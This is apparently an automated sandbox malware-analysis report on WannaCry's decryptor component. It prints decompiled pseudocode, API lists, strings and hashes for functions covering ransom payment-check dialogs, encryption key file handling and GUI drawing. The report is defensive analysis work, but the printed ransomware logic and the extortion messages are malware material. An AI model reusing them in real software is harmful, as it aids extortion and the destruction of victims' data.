						asm("fild dword [esp+0x10]");
						_t303 = _t301 * st2 / st1;
						L0041304A();
						st0 = _t303;
						st0 = _t303;
						_v180 = _t163;
					}
					_t277 =  *((intOrPtr*)(_t281 + 0x54));
					if(_t277 == 0) {
						_t165 =  &_v180;
						if(_v148 == 0) {
							_t165 =  &_v164;
						}
						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
					} else {
						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
						if(_t277 != 0) {
							FillRect(_v264, _t177,  *(_t277 + 4));
						} else {
							FillRect(_v264, _t177, 0);
						}
					}
					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
					_v292 = 0x4166e0;
					_v52 = 7;
					if(_v244 == 0) {
						_v284 = 0;
						_v288 = 0;
						_v52 = 6;
					} else {
						_t172 = _v256;
						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
						_t112 =  &_v324; // 0x4166e0
						E00409F10(_t112, _v300);
						_v88 = 6;
					}
				}
				_t133 =  &_v252; // 0x41675c
				_t152 = E00409E20(_t133);
				_v28 = 0;
				L00412E3C();
				_v28 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v36;
				return _t152;
			}








































































                                  0x004086e0
                                  0x004086e0
                                  0x004086e0
                                  0x004086e2
                                  0x004086ed
                                  0x004086ee
                                  0x004086fd
                                  0x00408700
                                  0x00408708
                                  0x00408718
                                  0x0040871f
                                  0x00408736
                                  0x00408742
                                  0x00408743
                                  0x00408746
                                  0x0040874f
                                  0x00408758
                                  0x00408760
                                  0x00408765
                                  0x0040876d
                                  0x0040877d
                                  0x00408789
                                  0x00408791
                                  0x00408795
                                  0x00408799
                                  0x0040879d
                                  0x004087a1
                                  0x0040883f
                                  0x0040884a
                                  0x0040884e
                                  0x004087a7
                                  0x004087ba
                                  0x004087cd
                                  0x004087d8
                                  0x004087dd
                                  0x00408804
                                  0x00408809
                                  0x0040881f
                                  0x00408823
                                  0x0040882b
                                  0x0040882c
                                  0x00408831
                                  0x00408831
                                  0x00408856
                                  0x0040885e
                                  0x00408862
                                  0x00408865
                                  0x00408867
                                  0x0040888c
                                  0x0040888d
                                  0x00408892
                                  0x00408869
                                  0x00408869
                                  0x0040886f
                                  0x0040886b
                                  0x0040886b
                                  0x0040886b
                                  0x0040887d
                                  0x0040887d
                                  0x0040889e
                                  0x0040889f
                                  0x004088a4
                                  0x004088ae
                                  0x00408a7d
                                  0x00408a85
                                  0x00408a8f
                                  0x00408ae5
                                  0x00408ae9
                                  0x00408a91
                                  0x00408a91
                                  0x00408ab9
                                  0x00408abe
                                  0x00408ac4
                                  0x00408ad8
                                  0x00408add
                                  0x00408ade
                                  0x00408ac6
                                  0x00408ac8
                                  0x00408acd
                                  0x00408ace
                                  0x00408ace
                                  0x00408ac4
                                  0x00408aed
                                  0x004088be
                                  0x004088c0
                                  0x004088c9
                                  0x004088d0
                                  0x004088dd
                                  0x004088e4
                                  0x004088e8
                                  0x004088ec
                                  0x004088f0
                                  0x004088f4
                                  0x004088f8
                                  0x004088ff
                                  0x0040891e
                                  0x00408901
                                  0x0040890b
                                  0x0040890b
                                  0x0040892d
                                  0x00408934
                                  0x00408935
                                  0x0040893b
                                  0x0040893d
                                  0x00408941
                                  0x00408945
                                  0x00408949
                                  0x0040894f
                                  0x00408951
                                  0x00408958
                                  0x0040895c
                                  0x0040897e
                                  0x00408980
                                  0x0040895e
                                  0x00408963
                                  0x00408967
                                  0x0040896d
                                  0x0040896f
                                  0x00408974
                                  0x00408976
                                  0x00408978
                                  0x00408978
                                  0x00408982
                                  0x00408988
                                  0x004089d3
                                  0x004089d7
                                  0x004089d9
                                  0x004089d9
                                  0x004089ec
                                  0x0040898a
                                  0x0040899e
                                  0x004089a5
                                  0x004089c2
                                  0x004089a7
                                  0x004089b0
                                  0x004089b0
                                  0x004089a5
                                  0x00408a05
                                  0x00408a0b
                                  0x00408a17
                                  0x00408a21
                                  0x00408a6b
                                  0x00408a6f
                                  0x00408a73
                                  0x00408a23
                                  0x00408a23
                                  0x00408a4b
                                  0x00408a54
                                  0x00408a59
                                  0x00408a5e
                                  0x00408a5e
                                  0x00408a21
                                  0x00408af5
                                  0x00408af9
                                  0x00408b02
                                  0x00408b09
                                  0x00408b15
                                  0x00408b20
                                  0x00408b2f
                                  0x00408b3c

                                  APIs
                                  • #470.MFC42 ref: 00408708
                                  • GetClientRect.USER32(?,?), ref: 0040871F
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                  • #6734.MFC42(?,?), ref: 00408746
                                  • #323.MFC42(?,?), ref: 0040874F
                                  • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                  • #1640.MFC42(00000000), ref: 004087DD
                                    • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                    • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                  • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                  • FillRect.USER32(?,?,?), ref: 0040887D
                                  • #2754.MFC42(?,?), ref: 00408892
                                  • #2381.MFC42(?,?,?), ref: 0040889F
                                  • #3797.MFC42(?,?,?), ref: 004088C0
                                  • _ftol.MSVCRT ref: 00408951
                                  • _ftol.MSVCRT ref: 0040896F
                                  • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                  • #640.MFC42(?,?,?), ref: 00408B09
                                  • #755.MFC42(?,?,?), ref: 00408B20
                                    • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                  • String ID: \gA$fA$fA
                                  • API String ID: 1027735583-2217880857
                                  • Opcode ID: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                  • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                  • Opcode Fuzzy Hash: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                  • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402AF0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 133COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wcsicmp$_wcsnicmpwcsstr
                                  • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                  • API String ID: 2817753184-2613825984
                                  • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                  • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401760 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 140filesynchronizationthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E00401760(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				struct _IO_FILE* _v32;
				void _v2059;
				void _v2060;
				void _v2571;
				void _v2572;
				char _v2576;
				char _v2604;
				void* _v2608;
				char _v2616;
				void* _v2636;
				void* _v2640;
				void* _t36;
				struct _IO_FILE* _t37;
				signed int _t38;
				unsigned int _t45;
				signed int _t49;
				void* _t50;
				signed int _t67;
				struct _IO_FILE* _t87;
				void* _t94;
				void* _t97;
				intOrPtr _t98;
				void* _t99;

				_push(0xffffffff);
				_push(E004134C6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_t99 = _t98 - 0xa28;
				_t94 = __ecx;
				L00412CD4();
				_t36 =  *(__ecx + 0xac);
				if(_t36 != 0) {
					WaitForSingleObject(_t36, 0xbb8);
					TerminateThread( *(_t94 + 0xac), 0);
					CloseHandle( *(_t94 + 0xac));
				}
				_t37 = E0040C670();
				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
					L15:
					 *[fs:0x0] = _v12;
					return _t37;
				} else {
					_t37 =  *(_t94 + 0xa8);
					if(_t37 != 1) {
						if(_t37 != 0xffffffff) {
							if(_t37 != 2) {
								goto L15;
							}
							_push(0);
							_push(0x40);
							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
							L14:
							L00412CC8();
							goto L15;
						}
						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
							L11:
							_push(0);
							_push(0xf0);
							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
							goto L14;
						}
						_t38 = rand();
						asm("cdq");
						_t37 = _t38 / 3;
						if(_t38 % 3 != 0) {
							goto L11;
						}
						_push(0);
						_push(0x30);
						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
						goto L14;
					}
					_v2572 = 0;
					memset( &_v2571, 0, 0x7f << 2);
					asm("stosw");
					asm("stosb");
					_v2060 = 0;
					memset( &_v2059, 0, 0x1ff << 2);
					asm("stosw");
					asm("stosb");
					sprintf( &_v2604, "%08X.dky", 0);
					_t37 = fopen( &_v2604, "rb");
					_t87 = _t37;
					_t99 = _t99 + 0x2c;
					if(_t87 == 0) {
						_push(0);
						_push(0xf0);
						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
						L00412CC8();
						 *(_t94 + 0xa8) = 0xffffffff;
					} else {
						_t45 = fread( &_v2060, 1, 0x800, _t87);
						fclose(_t87);
						DeleteFileA( &_v2604);
						_t97 =  &_v2060;
						_t67 = _t45 >> 2;
						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
						_push("You have a new message:\n");
						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
						_t99 = _t99 + 0x2c;
						L00412CAA();
						_push( &_v2576);
						_push(_t50);
						_push( &_v2616);
						_v8 = 0;
						L00412CCE();
						_t37 =  *_t50;
						_push(0);
						_push(0x40);
						_push(_t37);
						_v20 = 1;
						L00412CC8();
						_v32 = 0;
						L00412CC2();
						_v32 = 0xffffffff;
						L00412CC2();
					}
					goto L15;
				}
			}





























                                  0x00401766
                                  0x00401768
                                  0x0040176d
                                  0x0040176e
                                  0x00401775
                                  0x0040177e
                                  0x00401780
                                  0x00401785
                                  0x0040178f
                                  0x00401797
                                  0x004017a5
                                  0x004017b2
                                  0x004017b2
                                  0x004017b8
                                  0x004017c3
                                  0x0040193e
                                  0x00401948
                                  0x00401955
                                  0x004017c9
                                  0x004017c9
                                  0x004017d2
                                  0x004018f9
                                  0x0040192f
                                  0x00000000
                                  0x00000000
                                  0x00401931
                                  0x00401932
                                  0x00401934
                                  0x00401939
                                  0x00401939
                                  0x00000000
                                  0x00401939
                                  0x00401901
                                  0x0040191f
                                  0x0040191f
                                  0x00401920
                                  0x00401925
                                  0x00000000
                                  0x00401925
                                  0x00401903
                                  0x00401909
                                  0x0040190f
                                  0x00401913
                                  0x00000000
                                  0x00000000
                                  0x00401915
                                  0x00401916
                                  0x00401918
                                  0x00000000
                                  0x00401918
                                  0x004017e3
                                  0x004017e7
                                  0x004017e9
                                  0x004017eb
                                  0x004017fa
                                  0x00401801
                                  0x00401803
                                  0x00401810
                                  0x00401811
                                  0x00401821
                                  0x00401827
                                  0x00401829
                                  0x0040182e
                                  0x004018da
                                  0x004018db
                                  0x004018e0
                                  0x004018e5
                                  0x004018ea
                                  0x00401834
                                  0x00401844
                                  0x0040184d
                                  0x0040185b
                                  0x00401863
                                  0x00401870
                                  0x00401873
                                  0x00401877
                                  0x0040187f
                                  0x0040187f
                                  0x00401885
                                  0x00401892
                                  0x00401893
                                  0x00401894
                                  0x00401895
                                  0x0040189c
                                  0x004018a1
                                  0x004018a3
                                  0x004018a4
                                  0x004018a6
                                  0x004018a7
                                  0x004018af
                                  0x004018b8
                                  0x004018bf
                                  0x004018c8
                                  0x004018d3
                                  0x004018d3
                                  0x00000000
                                  0x0040182e

                                  APIs
                                  • #6453.MFC42 ref: 00401780
                                  • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                  • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
                                  • CloseHandle.KERNEL32(?), ref: 004017B2
                                  • sprintf.MSVCRT ref: 00401811
                                  • fopen.MSVCRT ref: 00401821
                                  • fread.MSVCRT ref: 00401844
                                  • fclose.MSVCRT ref: 0040184D
                                  • DeleteFileA.KERNEL32(?), ref: 0040185B
                                  • #537.MFC42(You have a new message:), ref: 00401885
                                  • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                  • #1200.MFC42 ref: 004018AF
                                  • #800.MFC42 ref: 004018BF
                                  • #800.MFC42 ref: 004018D3
                                  • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                  Strings
                                  • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                  • You have a new message:, xrefs: 00401877
                                  • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                  • %08X.dky, xrefs: 0040180A
                                  • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                  • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                  • API String ID: 2207195628-1375496427
                                  • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                  • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004012E0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 202fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E004012E0(void* __ecx) {
				int _v4;
				intOrPtr _v12;
				void _v2059;
				void _v2060;
				void _v2192;
				void _v2196;
				intOrPtr _v2324;
				void _v2328;
				void _v2332;
				char _v2364;
				char _v2396;
				char _v2436;
				char _v2468;
				char _v2508;
				char _v2540;
				intOrPtr _t61;
				long _t65;
				struct _IO_FILE* _t83;
				int _t85;
				intOrPtr _t88;
				struct _IO_FILE* _t91;
				int _t97;
				void* _t100;
				char* _t123;
				void _t131;
				struct _IO_FILE* _t143;
				struct _IO_FILE* _t146;
				struct _IO_FILE* _t149;
				void* _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t161;
				void* _t164;
				void* _t166;
				void* _t169;
				void* _t172;

				_push(0xffffffff);
				_push(E004134A6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t161;
				_t61 =  *0x42189c; // 0x0
				_push(_t156);
				_t154 = __ecx;
				_t3 = _t61 + 0x50c; // 0x50c
				_t100 = _t3;
				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
				_t164 = _t161 - 0x9e0 + 0x18;
				_t65 = GetFileAttributesA( &_v2540);
				_t157 = _t156 | 0xffffffff;
				if(_t65 == _t157) {
					L4:
					_v2196 = 0;
					memset( &_v2192, 0, 0x21 << 2);
					_t143 = fopen("00000000.res", "rb");
					_t166 = _t164 + 0x14;
					__eflags = _t143;
					if(_t143 != 0) {
						fread( &_v2196, 0x88, 1, _t143);
						fclose(_t143);
						_v2332 = 0;
						memset( &_v2328, 0, 0x21 << 2);
						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
						_t146 = fopen( &_v2364, "rb");
						_t169 = _t166 + 0x34;
						__eflags = _t146;
						if(_t146 != 0) {
							fread( &_v2332, 0x88, 1, _t146);
							fclose(_t146);
							_t131 =  *0x421798; // 0x0
							_v2060 = _t131;
							memset( &_v2059, 0, 0x1ff << 2);
							asm("stosw");
							asm("stosb");
							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
							_t83 = fopen( &_v2396, "rb");
							_t149 = _t83;
							_t172 = _t169 + 0x34;
							__eflags = _t149;
							if(_t149 != 0) {
								_t85 = fread( &_v2060, 1, 0x800, _t149);
								fclose(_t149);
								_t39 = _t100 + 0x242; // 0x74e
								_t40 = _t100 + 0x1de; // 0x6ea
								E0040BE90("s.wnry", _t40, _t39);
								_t88 =  *0x42189c; // 0x0
								_push( *((intOrPtr*)(_t154 + 0x20)));
								_push( &_v2540);
								_push( *((intOrPtr*)(_t88 + 0x818)));
								_push( *((intOrPtr*)(_t88 + 0x81c)));
								_t46 = _t100 + 0xb2; // 0x5be
								_push(_t85);
								_push( &_v2060);
								_push(_v2324);
								_push( &_v2332);
								_push( &_v2196);
								_push(_t100 + 0xe4);
								_t91 = E0040C240( &_v2332, __eflags);
								_t172 = _t172 + 0x4c;
								_t83 = E0040C670();
								__eflags = _t91;
								if(_t91 >= 0) {
									E00404640( &_v2436);
									_v4 = 1;
									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
									__eflags = _t94;
									if(_t94 == 0) {
										 *(_t154 + 0xa8) = 1;
									} else {
										 *(_t154 + 0xa8) = 2;
									}
									_v4 = 0xffffffff;
									_t123 =  &_v2436;
									goto L15;
								}
							} else {
								 *(_t154 + 0xa8) = 0xffffffff;
							}
						} else {
							 *(_t154 + 0xa8) = 0xffffffff;
						}
					} else {
						 *(_t154 + 0xa8) = _t157;
					}
				} else {
					E00404640( &_v2508);
					_v4 = 0;
					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
						_t97 = DeleteFileA( &_v2540);
						_v4 = _t157;
						E00404690(_t97,  &_v2508);
						goto L4;
					} else {
						 *(_t154 + 0xa8) = 2;
						_v4 = _t157;
						_t123 =  &_v2508;
						L15:
						_t83 = E00404690(_t94, _t123);
					}
				}
				 *[fs:0x0] = _v12;
				return _t83;
			}







































                                  0x004012e6
                                  0x004012e8
                                  0x004012ed
                                  0x004012ee
                                  0x004012fb
                                  0x00401305
                                  0x00401307
                                  0x00401316
                                  0x00401316
                                  0x00401323
                                  0x00401339
                                  0x0040133b
                                  0x00401343
                                  0x00401349
                                  0x0040134e
                                  0x004013b0
                                  0x004013be
                                  0x004013d3
                                  0x004013db
                                  0x004013dd
                                  0x004013e0
                                  0x004013e2
                                  0x00401405
                                  0x00401408
                                  0x0040141c
                                  0x00401427
                                  0x00401440
                                  0x00401459
                                  0x0040145b
                                  0x0040145e
                                  0x00401460
                                  0x00401481
                                  0x00401484
                                  0x0040148a
                                  0x0040149e
                                  0x004014a8
                                  0x004014aa
                                  0x004014ac
                                  0x004014c1
                                  0x004014d4
                                  0x004014da
                                  0x004014dc
                                  0x004014df
                                  0x004014e1
                                  0x00401502
                                  0x00401507
                                  0x0040150d
                                  0x00401513
                                  0x00401520
                                  0x00401525
                                  0x0040152d
                                  0x0040153e
                                  0x0040153f
                                  0x00401547
                                  0x00401548
                                  0x00401556
                                  0x00401557
                                  0x0040155f
                                  0x00401567
                                  0x0040156e
                                  0x0040156f
                                  0x00401570
                                  0x00401575
                                  0x0040157a
                                  0x0040157f
                                  0x00401581
                                  0x00401587
                                  0x004015a2
                                  0x004015a9
                                  0x004015ae
                                  0x004015b0
                                  0x004015be
                                  0x004015b2
                                  0x004015b2
                                  0x004015b2
                                  0x004015c4
                                  0x004015cf
                                  0x00000000
                                  0x004015cf
                                  0x004014e3
                                  0x004014e3
                                  0x004014e3
                                  0x00401462
                                  0x00401462
                                  0x00401462
                                  0x004013e4
                                  0x004013e4
                                  0x004013e4
                                  0x00401350
                                  0x00401354
                                  0x00401367
                                  0x00401379
                                  0x0040139a
                                  0x004013a4
                                  0x004013ab
                                  0x00000000
                                  0x0040137b
                                  0x0040137b
                                  0x00401385
                                  0x0040138c
                                  0x004015d3
                                  0x004015d3
                                  0x004015d3
                                  0x00401379
                                  0x004015e3
                                  0x004015f0

                                  APIs
                                  • sprintf.MSVCRT ref: 00401323
                                  • sprintf.MSVCRT ref: 00401339
                                  • GetFileAttributesA.KERNEL32(?), ref: 00401343
                                  • DeleteFileA.KERNEL32(?), ref: 0040139A
                                  • fread.MSVCRT ref: 00401405
                                  • fclose.MSVCRT ref: 00401408
                                  • sprintf.MSVCRT ref: 00401440
                                  • fopen.MSVCRT ref: 00401453
                                    • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                  • fopen.MSVCRT ref: 004013D5
                                    • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                    • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                    • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                  • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                  • API String ID: 2787528210-4016014174
                                  • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                  • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004035A0 Relevance: 36.2, APIs: 24, Instructions: 175windowclipboardmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E004035A0(intOrPtr __ecx) {
				int _t51;
				void* _t54;
				long _t55;
				signed int _t64;
				signed int _t68;
				void* _t71;
				int _t78;
				short _t86;
				signed int _t92;
				intOrPtr _t110;
				int _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t128;
				intOrPtr _t129;
				void* _t130;
				void* _t132;
				void* _t134;

				_push(0xffffffff);
				_push(E0041365C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t129;
				_t130 = _t129 - 0x2e4;
				_t110 = __ecx;
				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
				if(_t51 != 0) {
					_t51 = OpenClipboard( *(_t110 + 0x20));
					if(_t51 != 0) {
						_t121 = 0;
						_t126 = 0;
						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
							do {
								_push(0);
								_t71 = _t130 + 0x18;
								_push(_t121);
								_push(_t71);
								L00412D7C();
								_push(0x4206e0);
								_push(_t71);
								_push(_t130 + 0x14);
								 *(_t130 + 0x308) = 0;
								L00412CCE();
								 *(_t130 + 0x2fc) = 2;
								L00412CC2();
								 *(_t130 + 0x2fc) = 0xffffffff;
								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
								L00412CC2();
								_t121 = _t121 + 1;
							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
						}
						_t122 = GlobalAlloc(2, _t126 + 2);
						 *(_t130 + 0x14) = _t122;
						if(_t122 != 0) {
							_t54 = GlobalLock(_t122);
							 *(_t130 + 0x10) = _t54;
							if(_t54 != 0) {
								_t78 = 0;
								_t128 = 0;
								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
								if(_t55 > 0) {
									while(1) {
										_push(0);
										_push(_t78);
										_push(_t130 + 0x24);
										L00412D7C();
										_push(0x4206e0);
										_push(_t55);
										 *((intOrPtr*)(_t130 + 0x304)) = 3;
										_push(_t130 + 0x24);
										L00412CCE();
										 *(_t130 + 0x2fc) = 5;
										L00412CC2();
										_t86 =  *0x42179c; // 0x0
										 *(_t130 + 0x24) = _t86;
										memset(_t130 + 0x26, 0, 0xb3 << 2);
										_t132 = _t130 + 0xc;
										asm("stosw");
										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
										_t64 = wcslen(_t132 + 0x24);
										_t123 = _t132 + 0x28;
										_t92 = _t64 << 1 >> 2;
										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
										_t134 = _t132 + 0x18;
										_t68 = wcslen(_t134 + 0x28);
										_t130 = _t134 + 8;
										_t128 = _t128 + _t68 * 2;
